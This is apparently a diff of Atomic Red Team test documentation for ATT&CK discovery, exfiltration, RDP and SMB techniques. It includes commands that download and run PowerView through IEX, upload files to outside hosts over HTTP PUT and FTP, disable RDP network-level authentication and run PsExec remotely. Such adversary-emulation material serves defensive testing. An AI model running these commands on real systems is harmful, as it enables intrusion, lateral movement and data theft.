-**auto_generated_guid:** 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 ip route show
 ```


+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: Check if ip command exists on the machine
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 apt-get install iproute2 -y
 ```

+### Atomic Test #14: Remote System Discovery - netstat

-
-
-<br/>
-<br/>
-
-## Atomic Test #14 - Remote System Discovery - netstat
 Use the netstat command to display the kernels routing tables.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `d2791d72-b67f-4615-814f-ec824a91f514`

-**auto_generated_guid:** d2791d72-b67f-4615-814f-ec824a91f514
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 netstat -r | grep default
 ```

+### Atomic Test #15: Remote System Discovery - ip tcp_metrics

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #15 - Remote System Discovery - ip tcp_metrics
 Use the ip tcp_metrics command to display the recent cached entries for IPv4 and IPv6 source and destination addresses.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `6c2da894-0b57-43cb-87af-46ea3b501388`

-**auto_generated_guid:** 6c2da894-0b57-43cb-87af-46ea3b501388
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 ip tcp_metrics show |grep --invert-match "^127\."
 ```


+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: Check if ip command exists on the machine
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 apt-get install iproute2 -y
 ```

+### Atomic Test #16: Enumerate domain computers within Active Directory using DirectorySearcher

-
-
-<br/>
-<br/>
-
-## Atomic Test #16 - Enumerate domain computers within Active Directory using DirectorySearcher
 This test is a Powershell script that enumerates Active Directory to determine computers that are joined to the domain. 
 This test is designed to mimic how SessionGopher can determine the additional systems within a domain, which has been used before by threat actors to aid in lateral movement. 
 Reference: [Head Fake: Tackling Disruptive Ransomware Attacks](https://www.mandiant.com/resources/head-fake-tackling-disruptive-ransomware-attacks). 
@@ -657,16 +474,9 @@ Upon successful execution, this test will output the names of the computers that

 **Supported Platforms:** Windows

+**auto_generated_guid:** `962a6017-1c09-45a6-880b-adc9c57cb22e`

-**auto_generated_guid:** 962a6017-1c09-45a6-880b-adc9c57cb22e
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 $DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
@@ -679,221 +489,143 @@ foreach ($Computer in $Computers) {
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: This PC must be joined to a domain.
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 write-host "This PC must be manually added to a domain."
 ```

+### Atomic Test #17: Enumerate Active Directory Computers with Get-AdComputer

-
-
-<br/>
-<br/>
-
-## Atomic Test #17 - Enumerate Active Directory Computers with Get-AdComputer
 The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
 Upon successful execution a listing of Computers will output with their paths in AD.
 Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md

 **Supported Platforms:** Windows

+**auto_generated_guid:** `97e89d9e-e3f5-41b5-a90f-1e0825df0fdf`

-**auto_generated_guid:** 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 Get-AdComputer -Filter *
 ```

+### Atomic Test #18: Enumerate Active Directory Computers with ADSISearcher

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #18 - Enumerate Active Directory Computers with ADSISearcher
 The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
 Upon successful execution a listing of computers will output with their paths in AD.
 Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/

 **Supported Platforms:** Windows

+**auto_generated_guid:** `64ede6ac-b57a-41c2-a7d1-32c6cd35397d`

-**auto_generated_guid:** 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
 ```

+### Atomic Test #19: Get-DomainController with PowerView

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #19 - Get-DomainController with PowerView
 Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `b9d2e8ca-5520-4737-8076-4f08913da2c4`

-**auto_generated_guid:** b9d2e8ca-5520-4737-8076-4f08913da2c4
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
 ```

+### Atomic Test #20: Get-WmiObject to Enumerate Domain Controllers

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #20 - Get-WmiObject to Enumerate Domain Controllers
 The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
 Upon successful execution a listing of Systems from AD will output with their paths.
 Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1

 **Supported Platforms:** Windows

+**auto_generated_guid:** `e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad`

-**auto_generated_guid:** e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
 catch { $_; exit $_.Exception.HResult }
 ```

+### Atomic Test #21: Remote System Discovery - net group Domain Controller

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #21 - Remote System Discovery - net group Domain Controller
 Identify remote systems with net.exe querying the Active Directory Domain Controller.
 Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Controller" in the domain. Output will be via stdout.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `5843529a-5056-4bc1-9c13-a311e2af4ca0`

-**auto_generated_guid:** 5843529a-5056-4bc1-9c13-a311e2af4ca0
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 net group /domain "Domain controllers"
 ```

+### Atomic Test #22: Enumerate Remote Hosts with Netscan

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #22 - Enumerate Remote Hosts with Netscan
 This test uses Netscan to identify remote hosts in a specified network range.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `b8147c9a-84db-4ec1-8eee-4e0da75f0de5`

-**auto_generated_guid:** b8147c9a-84db-4ec1-8eee-4e0da75f0de5
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | netscan_path | NetScan exe location | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;netscan&#92;64-bit&#92;netscan.exe|
 | range_to_scan | The IP range to scan with Netscan | string | 127.0.0.1-127.0.0.1|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt" /range:'#{range_to_scan}'
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 remove-item "$env:temp\T1018NetscanOutput.txt" -force -erroraction silentlycontinue
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Netscan must be installed
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{netscan_path}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
 Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" "https://www.softperfect.com/download/files/netscan_portable.zip"
 Expand-Archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\netscan"
 ```

-
-
-
-<br/>
@@ -1,45 +1,36 @@
 # T1020 - Automated Exfiltration
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1020)
-<blockquote>

-Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020) 
+## Description from ATT&CK

-When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).
+> Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020)
+> 
+> When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).

-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1020)

 ## Atomic Tests

- [Atomic Test #1 - IcedID Botnet HTTP PUT](#atomic-test-1---icedid-botnet-http-put)
+- [Atomic Test #1: IcedID Botnet HTTP PUT](#atomic-test-1-icedid-botnet-http-put)
+- [Atomic Test #2: Exfiltration via Encrypted FTP](#atomic-test-2-exfiltration-via-encrypted-ftp)

- [Atomic Test #2 - Exfiltration via Encrypted FTP](#atomic-test-2---exfiltration-via-encrypted-ftp)
+### Atomic Test #1: IcedID Botnet HTTP PUT

-
-<br/>
-
-## Atomic Test #1 - IcedID Botnet HTTP PUT
 Creates a text file
 Tries to upload to a server via HTTP PUT method with ContentType Header
 Deletes a created file

 **Supported Platforms:** Windows

+**auto_generated_guid:** `9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0`

-**auto_generated_guid:** 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file | Exfiltration File | string | C:&#92;temp&#92;T1020_exfilFile.txt|
 | domain | Destination Domain | url | https://google.com|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 $fileName = "#{file}"
@@ -49,41 +40,29 @@ $contentType = "application/octet-stream"
 try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 $fileName = "#{file}"
 Remove-Item -Path $fileName -ErrorAction Ignore
 ```
+### Atomic Test #2: Exfiltration via Encrypted FTP

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Exfiltration via Encrypted FTP
 Simulates encrypted file transfer to an FTP server. For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `5b380e96-b0ef-4072-8a8e-f194cb9eb9ac`

-**auto_generated_guid:** 5b380e96-b0ef-4072-8a8e-f194cb9eb9ac
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | sampleFile | Path of the sample file to exfiltrate. | String | C:&#92;temp&#92;T1020__FTP_sample.txt|
 | ftpServer | FTP server URL. | Url | ftp://example.com|
 | credentials | FTP server credentials. | String | [user:password]|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 $sampleData = "Sample data for exfiltration test"
@@ -93,13 +72,8 @@ $creds = Get-Credential -Credential "#{credentials}"
 Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore
 ```
-
-
-
-
-
-<br/>
@@ -1,41 +1,32 @@
 # T1021.001 - Remote Services: Remote Desktop Protocol
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/001)
-<blockquote>

-Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
+## Description from ATT&CK

-Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) 
+> Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
+> 
+> Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)
+> 
+> Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)

-Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1021/001)

 ## Atomic Tests

- [Atomic Test #1 - RDP to DomainController](#atomic-test-1---rdp-to-domaincontroller)
+- [Atomic Test #1: RDP to DomainController](#atomic-test-1-rdp-to-domaincontroller)
+- [Atomic Test #2: Changing RDP Port to Non Standard Port via Powershell](#atomic-test-2-changing-rdp-port-to-non-standard-port-via-powershell)
+- [Atomic Test #3: Changing RDP Port to Non Standard Port via Command_Prompt](#atomic-test-3-changing-rdp-port-to-non-standard-port-via-command_prompt)
+- [Atomic Test #4: Disable NLA for RDP via Command Prompt](#atomic-test-4-disable-nla-for-rdp-via-command-prompt)

- [Atomic Test #2 - Changing RDP Port to Non Standard Port via Powershell](#atomic-test-2---changing-rdp-port-to-non-standard-port-via-powershell)
+### Atomic Test #1: RDP to DomainController

- [Atomic Test #3 - Changing RDP Port to Non Standard Port via Command_Prompt](#atomic-test-3---changing-rdp-port-to-non-standard-port-via-command_prompt)
-
- [Atomic Test #4 - Disable NLA for RDP via Command Prompt](#atomic-test-4---disable-nla-for-rdp-via-command-prompt)
-
-
-<br/>
-
-## Atomic Test #1 - RDP to DomainController
 Attempt an RDP session via Remote Desktop Application to a DomainController.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `355d4632-8cb9-449d-91ce-b566d0253d3e`

-**auto_generated_guid:** 355d4632-8cb9-449d-91ce-b566d0253d3e
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | logonserver | ComputerName argument default %logonserver% | string | $ENV:logonserver.TrimStart("&#92;")|
@@ -43,9 +34,7 @@ Attempt an RDP session via Remote Desktop Application to a DomainController.
 | username | Username argument default %username% | string | $ENV:USERNAME|
 | password | Password | string | 1password2!|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 $Server=#{logonserver}
@@ -56,148 +45,112 @@ mstsc /v:$Server
 echo "RDP connection established"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 $p=Tasklist /svc /fi "IMAGENAME eq mstsc.exe" /fo csv | convertfrom-csv
 if(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Computer must be domain joined
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 Write-Host Joining this computer to a domain must be done manually
 ```

+### Atomic Test #2: Changing RDP Port to Non Standard Port via Powershell

-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Changing RDP Port to Non Standard Port via Powershell
 Changing RDP Port to Non Standard Port via Powershell

 **Supported Platforms:** Windows

+**auto_generated_guid:** `2f840dd4-8a2e-4f44-beb3-6b2399ea3771`

-**auto_generated_guid:** 2f840dd4-8a2e-4f44-beb3-6b2399ea3771
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | OLD_Remote_Port | Default RDP Listening Port | string | 3389|
 | NEW_Remote_Port | New RDP Listening Port | string | 4489|

-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{NEW_Remote_Port}
 New-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort #{NEW_Remote_Port}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{OLD_Remote_Port}
 Remove-NetFirewallRule -DisplayName "RDPPORTLatest-TCP-In" -ErrorAction Ignore 
 Get-Service TermService | Restart-Service -Force -ErrorAction Ignore
 ```
+### Atomic Test #3: Changing RDP Port to Non Standard Port via Command_Prompt

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Changing RDP Port to Non Standard Port via Command_Prompt
 Changing RDP Port to Non Standard Port via Command_Prompt

 **Supported Platforms:** Windows

+**auto_generated_guid:** `74ace21e-a31c-4f7d-b540-53e4eb6d1f73`

-**auto_generated_guid:** 74ace21e-a31c-4f7d-b540-53e4eb6d1f73
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | OLD_Remote_Port | Default RDP Listening Port | string | 3389|
 | NEW_Remote_Port | New RDP Listening Port | string | 4489|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} /f
 netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} /f >nul 2>&1
 netsh advfirewall firewall delete rule name="RDPPORTLatest-TCP-In" >nul 2>&1
 net stop TermService /y >nul 2>&1
 net start TermService >nul 2>&1
 ```
+### Atomic Test #4: Disable NLA for RDP via Command Prompt

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Disable NLA for RDP via Command Prompt
 Disables network-level authentication (NLA) for RDP by changing a registry key via Command Prompt
 Disabling NLA for RDP can allow remote user interaction with the Windows sign-in screen prior to authentication. According to Microsoft, Flax Typhoon actors used this technique implementation to achieve persistence on victim systems: https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/
 See also: https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/enable_rdp.py

 **Supported Platforms:** Windows

+**auto_generated_guid:** `01d1c6c0-faf0-408e-b368-752a02285cb2`

-**auto_generated_guid:** 01d1c6c0-faf0-408e-b368-752a02285cb2
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | Default_UserAuthentication | Default UserAuthentication registry value | string | 1|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d 0 /t REG_DWORD /f
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d #{Default_UserAuthentication} /t REG_DWORD -f >nul 2>&1
 ```
-
-
-
-
-
-<br/>
@@ -1,41 +1,32 @@
 # T1021.002 - Remote Services: SMB/Windows Admin Shares
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/002)
-<blockquote>

-Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
+## Description from ATT&CK

-SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
+> Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
+> 
+> SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
+> 
+> Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)

-Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1021/002)

 ## Atomic Tests

- [Atomic Test #1 - Map admin share](#atomic-test-1---map-admin-share)
+- [Atomic Test #1: Map admin share](#atomic-test-1-map-admin-share)
+- [Atomic Test #2: Map Admin Share PowerShell](#atomic-test-2-map-admin-share-powershell)
+- [Atomic Test #3: Copy and Execute File with PsExec](#atomic-test-3-copy-and-execute-file-with-psexec)
+- [Atomic Test #4: Execute command writing output to local Admin Share](#atomic-test-4-execute-command-writing-output-to-local-admin-share)

- [Atomic Test #2 - Map Admin Share PowerShell](#atomic-test-2---map-admin-share-powershell)
+### Atomic Test #1: Map admin share

- [Atomic Test #3 - Copy and Execute File with PsExec](#atomic-test-3---copy-and-execute-file-with-psexec)
-
- [Atomic Test #4 - Execute command writing output to local Admin Share](#atomic-test-4---execute-command-writing-output-to-local-admin-share)
-
-
-<br/>
-
-## Atomic Test #1 - Map admin share
 Connecting To Remote Shares

 **Supported Platforms:** Windows

+**auto_generated_guid:** `3386975b-367a-4fbb-9d77-4dcf3639ffd3`

-**auto_generated_guid:** 3386975b-367a-4fbb-9d77-4dcf3639ffd3
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | Username | string | DOMAIN&#92;Administrator|
@@ -43,94 +34,69 @@ Connecting To Remote Shares
 | password | Password | string | P@ssw0rd1|
 | computer_name | Target Computer Name | string | Target|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
 ```

+### Atomic Test #2: Map Admin Share PowerShell

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Map Admin Share PowerShell
 Map Admin share utilizing PowerShell

 **Supported Platforms:** Windows

+**auto_generated_guid:** `514e9cd7-9207-4882-98b1-c8f791bae3c5`

-**auto_generated_guid:** 514e9cd7-9207-4882-98b1-c8f791bae3c5
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | share_name | Examples C$, IPC$, Admin$ | string | C$|
 | map_name | Mapped Drive Letter | string | g|
 | computer_name | Target Computer Name | string | Target|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
 ```

+### Atomic Test #3: Copy and Execute File with PsExec

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Copy and Execute File with PsExec
 Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).

 **Supported Platforms:** Windows

+**auto_generated_guid:** `0eb03d41-79e4-4393-8e57-6344856be1cf`

-**auto_generated_guid:** 0eb03d41-79e4-4393-8e57-6344856be1cf
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_path | File to copy and execute | path | C:&#92;Windows&#92;System32&#92;cmd.exe|
 | remote_host | Remote computer to receive the copy and execute the file | string | &#92;&#92;localhost|
 | psexec_exe | Path to PsExec | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;PsExec.exe|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 "#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
@@ -139,42 +105,25 @@ New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null
 Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "#{psexec_exe}" -Force
 ```

+### Atomic Test #4: Execute command writing output to local Admin Share

-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Execute command writing output to local Admin Share
 Executes a command, writing the output to a local Admin Share.
 This technique is used by post-exploitation frameworks.

 **Supported Platforms:** Windows

